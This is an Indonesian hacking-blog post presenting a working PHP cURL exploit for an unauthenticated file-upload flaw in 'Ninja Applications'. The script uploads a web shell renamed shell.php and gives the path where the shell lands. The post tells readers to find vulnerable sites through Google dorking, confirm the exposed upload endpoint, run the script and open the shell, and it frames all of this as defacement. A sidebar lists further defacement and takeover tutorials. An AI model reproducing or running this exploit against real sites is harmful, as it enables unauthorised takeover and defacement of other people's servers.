• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Exploit Ninja Application Remote Code Vulnerability

September 16, 2015 by Jack Wilder Leave a Comment

Kali ini saya akan share exploit yang lumayan poluler yaitu Exploit Ninja Application Remote Code Vulnerability. Oke langsung saja ke tutorial.
Google dorks : use your brain !
Vuln Code : {“jsonrpc” : “2.0”, “result” : null, “id” : “id”, “cleanFileName” : “”}
Victim : /ninja-applications/fufu/controllers/uploader/upload.php

Exploit Code :

<?php
$url = “http://localhost/ninja-applications/fufu/controllers/uploader/upload.php”; 
$post = array
(
“file” => “@shell.jpg”,
“name” => “shell.php”
);
$ch = curl_init (“$url”);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0”);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>

Shell access : localhost/uploads/temp/fufu(random code)shell.php . ex: fufu55f9730a4ea30sh.php
Pertama, dorking dulu di google.
Lalu cek urlnya : http://localhost/ninja-applications/fufu/controllers/uploader/upload.php
Jika ada vuln code seperti di ss, berarti situs tersebut bisa dieksekusi.
Tinggal di exploit dengan exploit code php diatas. Gunakan xampp di Windows atau langsung di Linux.
Tinggal diakses shell nya sesuai nama yang tertera di terminal.
Mudah bukan ? Sekian tutor kali ini semoga bermanfaat. 🙂

Filed Under: Uncategorized Tagged With: Deface, Exploit, Hacking

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Cara Mudah Hack cPanel dengan Fitur Reset Password

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Surge.sh Custom Domain or Subdomain Takeover

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

Deface dengan Metode Timthumb Remote Code Execution

Readme.io Custom Domain or Subdomain Takeover

Prestashop Module Blocktestimonial File Upload Auto Exploit

Zendesk Custom Domain or Subdomain Takeover

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

LinuxSec / 14 queries in 0.14 seconds